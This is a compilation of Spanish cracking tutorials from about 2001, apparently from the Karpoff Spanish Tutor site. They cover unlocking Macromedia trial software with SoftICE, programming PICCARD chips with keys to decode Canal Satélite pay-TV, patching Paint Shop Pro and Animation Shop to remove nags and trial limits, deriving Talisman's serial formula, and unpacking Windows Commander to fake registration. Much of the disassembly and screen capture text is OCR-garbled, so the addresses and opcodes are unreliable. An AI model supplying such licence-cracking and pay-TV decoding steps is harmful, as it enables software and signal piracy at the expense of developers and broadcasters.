Ya tenemos nuestro Unlocking Code en EAX, ahora lo más facil seria salir de SoftICE y ponerlo en su sitio para 
desbloquear el programa, pero a mi me queda una duda, ¿Donde y como se hace la comparación entre el Serial bueno 
y el de prueba que hemos puesto?, teniendo el Serial bueno no es una cosa que preocupe mucho, pero creo que este 
ensayo no estaría completo sin aclarar esto. Así que preparate para ver un poco más de código. 


La cosa no tiene mucho misterio, veamos, acabamos de retornar del call y estamos aquí: 


:100062B5 ESC6710000 call 1000D480 --> Aquí se genera el Serial 

:100062BA 83C40C add esp, 0000000C --> Estamos aquí, tenemos el Serial en EAX. 
:100062BD 33F6 xor esi, esi 

:100062BF 89B538FFFFFF mov dword ptr [ebp+FFFFFF38], esi 

:100062C5 6854FC0310 push 1003FC54 --> Guarda nuestro Serial de prueba. 
:100062CA 8D8D70FFFFFF lea ecx, dword ptr [ebp+FFFFFF70] --> El Serial Bueno. 
:100062DO0 51 push ecx --> Guardalo. 


* Reference To: KERNEL32.IstrcmpiA, Ord:02FFh 


| 

:100062D1 FF15CC300210 Call dword ptr [100230CC] --> LLamada a la función del Kernel32. 
:100062D7 8BC8 mov ecx, eax --> Por aquí 

:100062D9 83CFFF or edi, FFFFFFFF --> no volveremos a pasar 

:100062DC 8975FC mov dword ptr [ebp-04], esi --> si el Serial 

:100062DF B86F0D0000 mov eax, 00000D6F --> no es bueno. 

:100062E4 898528EEFFFE mov dword ptr [ebp+FFFFEE28], eax --> Esto es el comienzo 

:100062EA 99 cdq --> de la rutinas de 

:100062EB F7F9 idiv ecx -->encriptación del Serial para su colocación en el 

:100062ED 898528EEFFFF mov dword ptr [ebp+FFFFEE28], eax --> archivo CAWindowsIrsagent.ini. 


Entramos en la llamada a Kernel32!IstrempiA, fijarse que en ECX esta la dirección con el Serial bueno, avanzamos 
con F8. De Kernel32!lstrempiA pasamos a Kernel32!ord_62 y de ahí a Kernel32!IsBadWritePtr, seguimos con FS 
hasta llegar a este código: 


:¡BFF7A74C mov esi, [ebp+10] --> El Serial bueno. 
:¡BFF7A74F mov edi, [ebp+18] --> El nuestro de prueba. 
:BFF7A752 cmp esi, eax --> Una comparación , EAX = 0 por 
¡BFF7A754 jz BFF7A259 --> lo que no saltamos. 
:BFF7A75A cmp edi, eax --> Otra. 

:¡BFF7A75C jz BFF7A259 --> Idem. 

:BFF7A762 text ebx, BFF7A77B --> EBX es 1. 

:BFF7A768 jz BFF7A77B --> Saltamos... 

:¡BFF7A76A push 000003EC 

:¡BFF7A76F call Kernel32!SetLastError 

:¡BFF7A774 xor eax, eax 

:BFF7A776 ¡mp BFF7B292 

:¡BFF7A77B mov eax, [ebp+10] --> Aquí, el Serial bueno en EAX. 


:BFF7A77E mov ecx, [ebp+18] --> El de prueba en ECX. 
:BFF7A781 mov al, [eax] --> Primer caracter del Serial a AL. 
:¡BFF7A783 cmp [ecx], al --> Lo compara con el nuestro. 
:BFF7A785 ¡nz BFF7A7E8 --> Nos manda al carajo... 
:¡BFF7A787 cmp byte ptr [esi], 00 

:BFF7A78A jz BFF7A7E8 

:¡BFF7A78C inc esi 

:BFF7A78D inc edi 


La primera comparación se hace entre AL y ECX, el código que sigue a este fragmento son todo comparaciones entre 
ESI y EDI, donde se compara a las claras, valor por valor, el Serial Bueno y el que hemos introducido, como puedes 
ver no se han partido mucho los cuernos pensando. 


Por supuesto creo que no hay que decir que una vez que estamos dentro de alguna función del Kernel,o de cualquier 
otra dentro del Sistema, vamos, de tocar y cambiar cosas nada de nada, si no sigues mi consejo los resultados pueden 
ser expectaculares. 


REGISTRANDO EL PROGRAMA 


Tenemos el código de desbloqueo que introducimos en su casilla correspondiente, nos vuelve a pedir otro código, 
metemos el mismo y la cosa funciona. En la ventana final, después de rellenar los datos con lo que te de la gana, pones 
el Número de Serie que comienza por UDV y que hemos conseguido del archivo serialization, espera a que Sales 
Agent haga un Update y desaparezca de tu disco duro. ¡Felicidades! ya tienes un nuevo programa de Macromedia by 
the face. 


CONCLUSION 


Demos la gracias a la gente de Macromedia por sus fabulosos regalos, por que eso si, el programa una vez 
desbloqueado es para quitarse el sombrero. También hay que agradecerles los buenos ratos que nos hacen pasar 
aprendiendo a como NO se debe proteger un programa de la calidad y el precio de este. Esto es extensivo a todas las 
versiones Tryout de sus programas. 


Bueno pues creo que esto es casi todo, si me dejo algo o necesitas alguna aclaración estoy en: arkanian Omailcity.com 


Saludos y hasta otra. 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 
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INTRODUCCIÓN A LAS TARJETAS DE CANAL SATÉLITE 


| AUTOR: | XIRTAM | FECHA: | 23 104/2001 


INTRODUCCION 


En este tutorial vamos a ver todo lo que tenemos que saber 
para grabar nosotros mismos las tarjetas de Canal satélite 
digital; además desde donde comprar hasta como grabarla y 


con que herramientas. 


AL ATAKE 


Lo primero que debes hacer es conseguir una tarjeta, existen multitud de 
modelos pero nosotros vamos a usar la PICCARD. Para conseguirla búscate la vida 
por ahí o cómprala por internet yo por si acaso te pongo unas Cuantas 


direcciones donde las puedes conseguir: 


wwWw.virtualsat.net 


www.electronicasuiza.com 


En estas direcciones puedes conseguir todo lo que necesitas. 


¿Qué necesito? 


Bien lo que necesitas es la PICCARD en cuestión, un GRABADOR, de los que 
también existen multitud de modelos, nosotros usaremos el TE - 20 que tiene dos 
zócalos (que nos interesan) en los que se tienen que meter los chips 


manualmente y un cable serie para conectar el GRABADOR con el PC 


¿Qué es esto? 


Antes de nada una breve explicación; el chip más grande es el PIC (16F84) y el 
pequeño es la EPROM (24LC16B). El PIC es el que tiene la lista de canales... la 
EPROM es la que tiene el código con las keys para decodificar todos los 


Canales. 


¿Qué programas necesito? 


Solamente necesitas dos programas el "IC-Prog" y el "pic.exe" 


IC-Prog 0.9c - Prototype Programmer Al ES 
File Edit Settings Command View Help 


Address - Program Code 


Configuration 


0000: 3FFF 3FFF 
0008: 3FFF 3FFF 3FFF 3FFF 3FFF 3FFF 3FFF 3FFF  YVVVYVYVVVY 
0010: 3FFF 3FFF 3FFF 3FFF 3FFF 3FFF 3FFF 3FFF  YVVWWVYVVY 
0018: 3FFF 3FFF 3FFF 3FFF 3FFF 3FFF 3FFF 3FFF  YVVVYWVYYVY 
0020: 3FFF 3FFF 3FFF 3FFF 3FFF 3FFF 3FFF 3FFF YVVWYVYVVVY 
0028: 3FFF 3FFF 3FFF 3FFF 3FFF 3FFF 3FFF 3FFF  YVVVVWVYVYVY 
0030: 3FFF 3FFF 3FFF 3FEF 3FFF 3FEFF 3FFF 3FFF  YVVVVVYVVVY 
0038: 3FFF 3FFF 3FFF 3FFF 3FFF 3FFF 3FFF 3FFF YVVWWVYVVYVY 
0040: 3FFF 3FFF 3FFF 3FFF 3FFF 3FEFF 3FFF 3FFF  YVYVYVVYVVVY 
0048: 3FFF 3FFF 3FFF 3FFF 3FFF 3FFF 3FFF 3FFF  YVVWWVYVVY 
0050: 3FFF 3FFF 3FFF 3FFF 3FFF 3FFF 3FFF 3FFEF  YVVVVVVVVY 
0058: 3FFF 3FFF 3FFF 3FFF 3FFF 3FFF 3FFF 3FFF  YVVWWWVVVV hA| 


Dscillator: 
RE 


Address - Eeprom Data 


Checksum 1D Yalue 


Config word : 3FFFh 


JDM Programmer on Com 2 Device: PIC 16F84 


File evice ICsettings 


Load' in 
Load'ex 
avebufBin 
SavebufHe 
1ewbuffer 
fibout 

xit 


http://www.bos. a E 
E-Mail: waklostbos.nl 


a Program by Willem Kloosterhuis empty 
16084 
Henk Schaer 
LPT1 


Este es el aspecto de los dos programas. 
¿Cómo grabo los chips? 


Veamos con el IC-Prog se pueden grabar los dos chips pero vamos a grabar solo 


el PIC, la EPROM la vamos a grabar con el programa "pic.exe". 


Veamos como se graba el PIC: 


Lo primero que tienes que hacer es seleccionar el dispositivo a grabar: 


..+1C-Prog 0.9c - Prototype Programmer 
File Edit | Settings Command View Help 


— Address - MLS 4Wwire Eeprom » Configuration 

Hardware F3 12C Eeprom » FEF. vv vere ON 
Harciware Check Flash E > FFF pllboldetated Y z z z y 2 z poa 
Options IM-Bus Eeprom » PIC 16F83 
Smartcard (Phoenix) M icrochip PIC » PIC 120508 PIC 16F8: 

3FFF 3FFE 3FFF 3FFF/  MiciowieEeptom » [pc 72c508a PIC 160622 

3FFF 3FEF 3FFF 3FFF [MEA >” PIC 120509 PIC 16F628 

3FFF 3FFF 3FFF 3FFF SPI uE > PIC 1205094, PIC 160715 

3FFF 3FFF 3FFF 3FFF 3FFF 3FFF 3FFF PIC12CE518 PIC 16F873 

3FFF 3FEF 3FEF 3FEF 3FEF 3FFF 3FFEF PIMIOTER1A PIN 1RFA7A 


Ahora selecciona el archivo que quieres grabar: 


El ES 
[E anonricacionessssssssss || a] ¿2 e) EL) 


Jotros 
Pasantes 
viadigital 
EEP_Noáuto_ Astra Rá4JDAR_160301.hex 


Polac.2004eprábril hex 


Pic_6969 | 
IHXS files (*.hex,*.h8) 


L 


Y por último grábalo: 


Program Al 


Como se graba la EPROM: 


El método es similar, selecciona el dispositivo: 


*WHillem?s PicProg PicProgrammer*Hillem”s 
*26-3-99 1.02 fre 24C02 1.02 

«hllem's PicProg 24C04 

*26-3-99 1.02 fre 25C08 

*Millem's PicProg 24016 

*26-3-99 1.02 fre 24032 

«hllems PicProg 24065 m? PicProgrammer*d!illem?s 
*26-3-99 1.02 fre 16084 1.02 freeware!*x*26-3-99 1. 
AlMllems PicProg 16F34 1 Ñ PicProgrammer+>dHillem?s 
*26-3-99 1.02 fre 120508 =3-99 1 

*Wlhillem's PicProg llem?s 


411 1lem merdlillem?s PicProgrammerx*Willem”s 
Load: in relxx*26-3-99 1.02 freeware!**26-3-99 1 
LoadHex PicProgrammerz=dli1llem?s 
avebufBin' PIC_6969.HEX 
SavebufHe:  EEP_H0*1.HEXZ 
iewbuffer POLAC2”2.HEX 
bout 
x1t 
+11 1lem merx*llillem?s PicProgrammer**10illem?s 


Antes de grabar haz lo siguiente: 


En el menú OPTIONS elige Ludipipo y el puerto en el que tengas el cable e]: 
(COM1) 


*Nillem?s PicProgrammerx*lHillem?s PicProgrammer+d)illem”s 

*26-3-99 1.02 freeware!x**26-3-99 1.02 freeware!**26-3-99 1. enk Schaer 
Wlhillem?s PicProgrammer*«WHillem?s PicProgrammerx*)illem?s David Tait 0 
*26-3-99 1.02 freeware!**26-3-99 1.02 freeware!**26-3-99 1. David Tait 0 
«lhillem?s PicProgrammerx*lillem?s PicProgrammer**Hillem”s Lpt 
*26-3-99 1.02 freeware!**26-3-99 1.02 freeware!**26-3-99 1.  1pt 
lillem?s PicProgrammer*Hillem?s PicProgrammerxdlillem”s udiPipo 
*26-3-99 1.02 freeware!*x*26-3-99 1.02 freeware!**26-3-99 1. C0M1 
WAlillem?s PicProgrammer*Hillem?s PicProgrammerxWHillem?s C0H2 
*26-3-99 1.02 freeware!**26-3-99 1.02 freeware!**26-3-99 1.  C0M3 
Wlhillem?s PicProgrammer*Wlillem?s PicProgrammerxWlillem?s COH4 
*26-3-99 1.02 freeware!**26-3-99 1.02 freeware!**26-3-99 1. esthardware 
«lhillem?s PicProgrammer*Wlillem?s PicProgrammer**Hillem?s 

*26-3-99 1.02 freeware!*x*26-3-99 1.02 freeware 

«lillem?s PicProgrammer*Hillem?s PicProgramme 

*26-3-99 1.02 freeware!**26-3-99 1.02 freeware 

A is 

*26-3-99 1.02 freeware!**26-3-99 1.02 freeware 

*«lillem?s PicProgrammerx*dlillem?s PicProgramme 

*26-3-99 1.02 freeware!*x26-3-99 1.02 freeware 


Después de configurar el GRABADOR dale a Testhardware para haber si te lo 


detecta y finalmente grábalo: 


*Nillems PicProgrammer*«lillem?s PicProgrammer 
*26-3-99 1.02 freeware!**26-3-99 1.02 freeware! ead 
lhillem?s PicProgrammer*«WHillem?s PicProgrammer Program 


*26-3-99 1.02 freeware!**26-3-99 1.02 freeware! Co pare 
lillem?s PicProgrammer*«hHillem?s PicProgrammer EraseP € 
*26-3-99 1.02 freeware!**26-3-99 1.02 freeware! ustPic 
*NHillem”s PicProgrammersWi llem s FicPregramer Clear uffer 
*?26-3-99 | sewarelr26-3-99 | eu re 


*NOTA: Si te da error es porque este programa a veces da problemas al abrir el 
puerto. Para solucionarlo se puede abrir el IC-Prog y darle en el Menú a 
Command / Read all seguido vulve a darle a Testhardware y te pondrá un mensaje 


"Hardware Present" graba y ya está. 


EEN 


Notas Finales: 


Los programas puedes encontrarlos en la página de virtualsat en la 


sección software. 


Los chips tienen una hendidura que debe coincidir con la de los 


zócalos a la hora de grabar, sino se rompe el chip. 


16F84 24LC16B 


p <= Endidura 3 <= Endidura 
po 7] 


Zócalo Zócalo 


Lo que se expone en este manual está comprobado ya que se ha hecho 


basandose en la propia experiencia. 


Esta página no contiene enlaces a páginas ilegales ni de caracter 


ilícito, todo lo aquí expuesto es totalmente legal 


Saludos a EBUC 


ESTE TEXTO SE HA HECHO CON FINES EDUCATIVOS EN 
NINGÚN MOMENTO EL AUTOR NI EL DUEÑO DE LA 
PÁGINA SE RESPONSABILIZAN DEL USO INDEBIDO QUE 
SE HAGA DE LA INFORMACIÓN. 


Si teneis alguna duda o pregunta mandarme un Email si puedo os responderé. 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Karpoff Spanish Tutor 2001 


Programa: [Paint Shop Pro 7.0 y Animation Shop 3.0 Paint Paint Shop Pro 7.0 y Animation Shop 3.0 | Pro 7.0 y Animation Shop 3.0 


PROTECCION: Evaluación de 30 dias 
Objetivo: Límite de tiempo y nags-screen 


* HexEditor (Hacker's View o HexWorkShop 2.54) 
Herramientas: * SoftlCE 3.2x 


* KrackPE AS de nuMIT_or (KUT) ) 


INTRODUCCION 


Bueno creo que poco puedo decir de este magnifico programa que no sepais ya. Puede que sea uno de los mejores 
programa de retoque fotografico que exista, por eso debemos evaluarlo correctamente, ¿no os parece?. 


Bueno el sistema de protección es una nag cada vez que cargamos el programa, tanto el Paint Shop Pro (PSP) como 
el Animation Shop (AS), siempre nos aparece, y tambien tiene un tiempo de "retardo del programa" ya que no 
podemos pulsar el botón START hasta que no pasen unos segundos. 


Por último solo lo podemos evaluar durante 30 dias, lo cual, no sé ... 


AL ATAKE 


Empezamos quitando esas nags : 


Primero que quiero decir es que me perdonen los crackers más avanzados por lo que yo pueda 
decir aqui o por mi manera Casi " torpe " de cazar el nag. Y os lo voy a explicar: he 
probado unos bpx y nada de nada, entonces, porque no hacerlo a lo bestia, me explico, 
cargamos el loader del softice (si), y vamos traceando el PSP con F10 hasta encontrar alguna 
Call que cargue la nag, Cada vez que la encontremos le ponemos un bpx, traceamos despues 
dentro de ella hasta encontrar una rutina interesante o alguna call que cargue esa nag, y si 
es asi le ponemos otro bpx, y asi sucesivamente... 


Tras muchos bpx y tambien mucho tracear vemos sobre una call final se carga la nag 


PSP: esta Call es 00727CB7 E8E8C70E00 call 008144A4 


Bien, lo que tenemos que hacer ahora es ver que cosas interesantes pasan en esta llamada, y 
qué podemos hacer.Por eso nos metemos (con F8) en ella y podemos ver: 


727CB7 E8E8C70E00 
72"BCB 8B0D84DE9500 


call 008144A4 
mov eax, [eax+04] 


T127CC05 33FF xor edi,edi 

727CC9 1919 jnz 727CE4 ----Salta y nos lleva a la nag---- 
727CCB 8BC8 mov ecx, eax 

XXXXXX ret 

727CE4 empieza la rutina de la llamada a la nag. 

nota: 


perdonad que la ponga asi ya que por falta de tiempo y tb, porque mi ordenata se que un poco 
pillao no lo he " podio " poner como el siguiente fragmento. 


Podemos ver que justo el en pricipio de la cadena existe una comparación que nunca va poder 
ser igual y que despues hay un salto que siempre se da y se dirige hacia las rutinas que 


generan la nag. La cosa esta clara, 


¿no?, nopear este salto!. Con esto hacemos volcer al 


codigo de donde hemos sido llamados pero sin pasar por las rutinas de formación de la nag 
jeje. Muy bien, ahora nos que da el AS, pero es que su esquema es Casi el mismo:La call ha 


inspeccionar será: 


4F8B6D E87E780400 call 00 


5403F0 


Tras darle al F8 para ver lo que hay sale: 


:005403FE 648925000000 
:00540405 sl 


* Reference To: MFC42.Ordinal:0490, 


:00540406 E8BDB50400 
:0054040B 8B0D443D5F00 
:00540411 8B4004 
:00540414 85C9 
:00540416 7518 
:00540418 8BC8 
:0054041A E8D1BAECFF 
:0054041F 33C0 
:00540421 8B4C2404 
:00540425 64890D000000 
:0054042C 83C410 
:0054042F Cc3 


00 mov dword ptr fs:[00000000], esp 
push ecx 


Ord:0490h 


Call 0058B9C8 


mov 
mov 


ecx, dword ptr [005F3D44] 
eax, dword ptr [eax+04] 


test ecx, é€0x 


jne 
mov 


00540430-—-—->Salta y nos lleva a la nag<--- 
ecx, eax 


call 0040BEFO 


xor 
mov 
00 mov 
add 
ret 


eax, eax 
ecx, dword ptr [esp+04] 
dword ptr fs:[00000000], ecx 
esp, 00000010 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :00540416(C) == Rutina de formación de la nag---=-=-=-=-=-=-=-=-= 


:00540430 A1483D5F00 
:00540435 85C0 
:00540437 7411 
:00540439 33C0 


mov eax, 
test eax, 


dword ptr [005F3D48] 


eax 


je 0054044A 


xor eax, 


eax 


Aqui se puede ver que tras varias instrucciones testea ecx,ecx , y despues hay un salto, 
éste siempre se produce y nos lleva a la nag, para evitarlo, pues a nopearlo tambien!!!. 


Bueno esta claro que a nosotros nos interesa estos dos saltos: 


=>727CC9 “7519 3jnz 00727 


CE4  ===-- 


--este es el del PSP. 


=>540416 jnz 00540430 — ------ este es el del AS. 


Debemos buscar el offset para cambiar los bytes que queremos, para ello una de dos: 
1.—-Desensamblamos y miramos dirección y el offset, con el wdasm, o: 


2.—Usamos el KrackPE de nuMIT_or, esta opción es la recomendable ya que PSP ocupa Casi 9 MB 
y el AS casi 3MB, por lo que la 1* opción puede ser lenta. 


Su forma de usarse es muy sencilla se elgien el prog. a estudiar se le introduce la 
diercción virtual y le damos a GET OFFSET para obtener el offset que nos interesa. 


Bueno madiante este programa ( gracias nuMIT_or ) obtenemos: 
1.-PSP===>327CC9h 
2.-AS===>140416h 


Cambiarlos ( jnz por jz , Oo por, nop ) y fuera nags. ;-) 


Seguimos, quitando el límite de tiempo: 


Bueno, colegas ya aqui parece que no tengo que decir nada más debido a que cuando quitamos 
esas nags, impidiendo que se ejecutena algunas rutinas, tambien eliminamos este límite de 
tiempo que nos daban, por lo que: 


Se puede dar por terminado este tutorial ! 
Nota 1: Este tutorial es para el estudio de las protecciones de los programas y no para uso 
lucrativo. 


Nota 2: Este tutorial se puede exponer en cualquier pagina dedicada a lo anterior 
mencionado, incluso cambiando de plantilla, pero, eso si :==>SE DEBE HACER REFERENCIA A SU 
AUTOR (o sea yo,kamui ) Y A SU PROPÓSITO, comprendido?? 


Nota 3: Para alguna consulta: kamui_flatinmail.com 


Bueno, hasta pronto, saludos al canal tcrackers del irc-hispano, al grupo de Tutoriales2000, 
a todos los que ma han ayudado, y a todos los crackers que escriben tutoriales, y a los que 
lo leen...Gracias. 
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Programa . Lighttek Software Talisman v1.61 


Protección: Serial/ Number 

Descripción: Utilidad para el escritorio de Windows 95/98/NT 
Dificultad: Facililla 

Download: http: //www.lighttek.com/ 


Herramientas: Softl CE 


Cracker: MeGaBiTe 16/01/2001 


INTRODUCCION 


Extraído de la ayuda del propio programa. 


[Talisman es un escritorio alternativo para Windows 95/98/NT. Usando "Talisman", usted puede crear 
cualquier interface para su ordenador. "Talisman" oculta el escritorio estándar de Windows. En el 
espacio de trabajo de "Talisman" puede poner cualquier número de botones o de imágenes. Estos 
objetos pueden tener cualquier forma o cualquier dimensión. Todos los objetos pueden ejecutar 
programas externos o comandos internos del shell. El número de formas (pantallas) puede estar en 
el rango de 1 a 1000. Cualquier objeto del a pantalla puede configurarse para que cambie de una 
forma a otra. Todas las configuraciones y todas las imágenes se guardan en una base de datos. 
Usted puede crear muchos themes "Talisman" y usar los objetos con enlaces para que vayan de un 
theme a otro. Puede usar "Talisman" como su shell por defecto en lugar del Explorer de Windows. 
"Talisman" tiene sus propios procedimiento de arranque, su propia bandeja de sistema y su propio 
menú 'Inicio'.] 


AL ATAKE 


Bueno, pues con todo lo maravilloso que parece ser éste programa y con todo lo que hace, creo que se 
debería haber pensado un sistema de protección un poco más potente. La verdad es que más simple no 
puede ser. En realidad, una chorrada. El esquema en elemental: el usuario debe introducir un Name y un 
Code. El programa recoge el Name; en un bucle recorre los caracteres del Name de principio a fín y va 
sumando los valores ASCII; ésta suma se guarda en un registro del microprocesador; cuando el bucle finaliza 
se multiplica la suma con una constante y éste resultado se compara con el Code que hemos introducido: si 
son iguales el programa se registra; en caso contrario, muestra el típico mensaje de error. ¡¡¡Elemental!!! 


Bueno, pues nada; vamos a éllo. Arrancamos el programa. Veremos que en la bandeja del sistema tenemos 
un nuevo ícono. Hacemos click con el botón derecho del ratón en dicho ícono y seleccionamos la opción 
'About/Registration ...'. Veremos ésta pantalla: 


Lighttek Software alisman is Shareware. This means that 
Talisman sion 1.61 , e sofh ailable to 
uation 

re forupto 3 

decide to k 


cure Internet 


seereadme.bd) . 
Online Registration 


a: Enter your registration name 


Your name Your code 


Register! 


Unre 
Afterthese s , will be the lawéul 
Y, T A T T SM A N owner ofthe program e 
Program by Arkadiy Istomin 


Bien, ahora vamos a introducir "MeGaBiTe" como Registration Name y "1193046" como Code. Evidentemente 
nos dará un mensaje de error, tal como podemos ver aquí abajo: 


Lighttek Software 
“ersion 1.61 


e readme.bd) 


Online Registration 


ourregistration name 


Unreaistered con 


4% TALISMAN 


Program by Arkadiy Istomin 


Bien. Vamos a lanzar Soft! CE y poner algún breakpoint. Intenté en primer lugar poner un breakpoint en 
'getWindowTextA', sin ningún resultado; después lo intenté con 'getDlgltemTextA', sin ningún éxito tampoco. 
Bien, antes ésta situación sólo queda recurrir a una función API que nunca suele fallar 'hMemCpy'. Ponemos 
un breakpoint en dicha función ("BPX HMEMCPY") y pulsamos F5 para regresar a la pantalla de Registro de 
Talisman. Como ésta pantalla sigue mantiendo los valores que hemos introducido anteriormente en sus 
editBox, lo único que deberemos hacer es pulsar con el ratón sobre el botón 'Register!'. Una que hagamos 
ésto Softl CE hará break al inicio de la función 'hMemCpy'; deberemos pulsar tres veces la tecla F5 y depués 
pulsamos F12 doce veces hasta que lleguemos a la siguiente posición en el código del programa: 


0177:0047EF76 CALL 00421290 
0177:0047EF7B XOR ESI,ESI >Aterrizamos aquí 
0177:0047EF7D MOV EAX, [EBP-08] >Mueve el User Name a EAX 0177:0047EF80 CALL 00403C2C 
>Calcula la longitud del User Name >y la pone en EAX 
0177:0047EF85 TEST EAX,EAX >¿Se ha introducido algo como User 
>Name? 
0177:0047EF87 JLE 0047EF9C >Si no es así, salta 
0177:0047EF89 MOV EDX,00000001 >Inicializa contador 
0177:0047EF8E MOV ECX, [EBP-08] >Pone el User Name en ECX 0177:0047EF91 MOVZX ECX,BYTE PTR 
[EDX+ECX-01] >Pone el primer >carácter del 
>Registration Name 
>en ECX 
0177:0047EF96 ADD ESI,ECX >Sumatorio de todos los caracteres 
>del User Name 
0177:0047EF98 INC EDX >Incrementa contador 
0177:0047EF99 DEC EAX >Decrementa el contador de la 
>longitud del User Name 0177:0047EF9A JNZ 0047EF8E >¿Hemos 
llegado al final? Si no es >así, reiniciar el bucle 
0177:0047EF9C MOV [EBP-14],ESI >Pone el sumatorio en la dirección 


>apuntada por EBP-14; ésta 
>dirección mantenía nuestro Code 
>falso 
0177:0047EF9F FILD DWORD PTR [EBP-14] >Convierte el número entero 
>guardado en al dirección 
>apuntada por EBP-14 en un 
>número real y lo envia a la 


>pila 
0177:0047EFA2 CALL 0040296C  >Pone el sumatorio en EAX 0177:0047EFA7 IMUL EAX,EAX,00000309 
>Multiplica el sumatorio por >309 hexadecimal y guarda 
el >resultado en EAX 
0177:0047EFAD MOV ESI,EAX >Copia el resultado de la 


>multiplicación en ESI 
0177:0047EFAF CMP ESI, [EBP-04] >Compara ESI con el contenido de la 
>dirección apuntada por EBP-04, que 
>no es otro que nuestro Code falso 


0177:0047EFB2 JNZ 0047F077 >Si no son iguales salta 


Bien, como decíamos al inicio de éste tutorial, el esquema de protección no puede ser más simple. La rutina 
recoge una cadena, se inicia un bucle que recorre todos los caracteres de dicha cadena, se suman los 
números de órden de la tabla ASCII de cada uno de los caracteres de la cadena y se guardan en una variable 
(léase registro del microprocesador), posteriormente ésa suma se multiplica por una constante (en éste caso 
"309 hexadecimal"), y por último se compara el resultado de dicha multiplicación con el Code que hemos 
introducido; si la comparación dá cero como resultado (es decir, si son iguales) el proceso de registro de 
finaliza con éxito; en caso contrario se nos muestra el mensaje de error que hemos visto antes. 


Obviamente, lo más sencillo es que cuando en nuestro proceso de depuración del código del programa 
lleguemos a la posición '0177:0047EFAF CMP ESI,[EBP-04]', averiguemos qué es lo que contiene el registro 
ESI ya que se tratará del Code correcto. Para éllo, hacemos lo siguiente: 


:? esi 
000852AE 0000545454 " RO" 


El depurador responde mostrándonos primeramente el valor hexadecimal del contenido del registro ESl y, 
ésto es lo que nos interesa, el valor decimal: "545454". Este debe ser nuestro Code correcto. No nos resta 
más que comprobarlo. Para éllo, primero desactivamos los breakpoints que podamos tener activos en el 
despurador escribiendo "BD *" e introducimos "545454" como Code. ¡Este es el resultado! 


Lightt 


istered for MeGaBiTe 


Program by Arkadiy Istomin 


¿Dónde se guardan los detalles del registro? Se guardan en el Registro de Windows, en las subclaves 
'usercode' y 'username' de la clave 'Mi PCAHKEY_CURRENT_USERISoftwarel Lighttek1 Talisman'. Si eliminamos 
cualquiera de las dos subclaves, el programa devendrá nuevamente al estado de 'Unregistered'. (Lo digo para 
que pueda practicar). 


Generar Registration Code 


Bueno, con éste pequeño formulario podrá registrar el programa con su Name. En cualquier caso, no creo que 
nadie tenga ninguna dificultad si quiere escribir un KeyGen. 


Me gustaría saludar a mis crackers favoritos y de los que más he aprendido. 


Son éstos: Torntxdo, The SandMan, BalckB, +Fravia, TNT!, ECD, Karpoff, Wkt. Esto no quiere decir que no 
haya otros extraordinarios crackers. 


NOTA: Si le gusta el programa, cómprelo. Los programadores pierden demasiado tiempo desarrollando su 
software como para que vengamos nosotros y no les compensemos por su trabajo. 


¡No es justo! 


Ensayo por: MeGaBiTe 
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Programa: Windows Commander 4.52 

PROTECCION: Fichero llave 

Objetivo: Simular estar registrados 

Descripcion: Excelente programa para manejar ficheros en windows 

Dificultad: Entre fácil y media 

DOWNLOAD : http://www.ghisler.com/ 

Herramientas: Softice, W32dasm, Editor Hexadecimal, ProcDump 

CRACKER: SnOp FECHA: 15/2/2001 
INTRODUCCION 


Hola a todos ! En este tutorial voy a contar como simular estar registrados en el excelente programa 
"Windows Commander 4.52". 


Deciros ke voy a partir de la base ke los ke lean este tutorial tienen ya unos conocimientos de cracking 
básicos e incluso avanzados. No voy a explicar mucho como se usan los programas ke vamos a usar pero si lo 
ke se debe hacer. Por todo ello he puesto la dificultad de este tutorial en más bien media ke fácil. 


Por otro lado considero ke el programa en cuestión no es fácil de crackear (al menos con el método ke yo he 
usado he tardado un par de días en enterarme de como iba la copla). Bueno vamos a lo bueno. 


AL ATAKE 


PRIMERA PARTE: TRABAJEMOS A GUSTO, COÑO 


Pues si, lo primero es trabajar a gusto. Aunque como veréis mi objetivo final será hacer un "loader" y no haría falta 
descomprimir el archivo (ke como vamos a ver está comprimido con Aspack) lo vamos ha hacer pq de esta forma 
podremos desensamblarlo con el w32dasm con lo cual veremos mejor como va el tema. Entonces en la copia 
descomprimida realizaremos los cambios pertinentes para probarlos. 


Vamos allá. Empecemos abriendo el ejecutable principal con el PE editor del ProcDump (no sin antes haber realizado 
la correspondiente copia de seguridad del fichero ke luego pasa lo ke pasa...). Si nos fijamos hay una sección llamada 
Aspack ke nos informa perfectamente de como está comprimido. Yo lo voy a descomprimir "manualmente" pq 
ninguna de las versiones ke me venían en el ProcDump me funcionaba (bueno, de hecho tampoco las probé con esta 
versión del windows commander pero en la 4.51 no funcionaba ninguna). 


Antes ke nada debemos cambiar el valor de la sección CODE - Characteristics de CODOOO40 a E0000020 en el fichero 
wincmd32.exe pq de esta manera conseguiremos ke el Sice (Soft Ice) rompa al iniciar el programa cuando lo 
cargamos con el Symbol Loader. Si no lo hacemos el programa entra directamente y no podemos poner los breakpoints 
como queremos. 


Bien una vez hecho esto cargamos el ejecutable ke hemos modificado en el symbol loader y lo ejecutamos. Nusetro 
objetivo será encontrar el punto de entrada original y dumpear el programa al disco duro mediante el Proc Dump. Para 
descomprimirlo voy a usar una técnica ke aprendí gracias al tutorial de Nopper sobre el Acdsee 3.0. Según él, la 
estructura de muchos compresores es, muy por encima, la siguiente: 


PUSHAD 

CALL rutina de descompresión 

POPAD (cuyo opcode es 61, lo podemos mirar mediante el Soft Ice) 
salto al inicio del programa descomprimido 


Por lo tanto vamos a intentar encontrar este POPAD. Para hacerlo, como sabemos ke su opcode es 61, vamos ha buscar 
este opcode a partir de donde rompemos inicialmente. Es decir ke si nos fijamos inicialmente el softice al ejecutar el 
windows commander des del fichero comprimido rompe en 5AE0O1. Luego pondremos: 


S 5AE001 L FFFFFF 61 


Esto buscará el número 61 en el código a partir de la posición especificada, 5AEOO1, y tantos bytes de longitud como 
le digamos (en nuestro caso he puesto ffffff ke es más ke suficiente). Recordad ke todos los números ke pongo son en 
hexadecimal. Como ya he dicho este tutorial no es para novatos y por eso doy por sentado ke el sistema hexadecimal 
se domina (entre muchas otras cosas). Y es ke como dijo Torrente: "Esto no es Bambi..." 


Bien, vemos ke esto nos devuelve la posición 5AE337. Pero si ponemos un breakpoint en esta posición no romperá el 
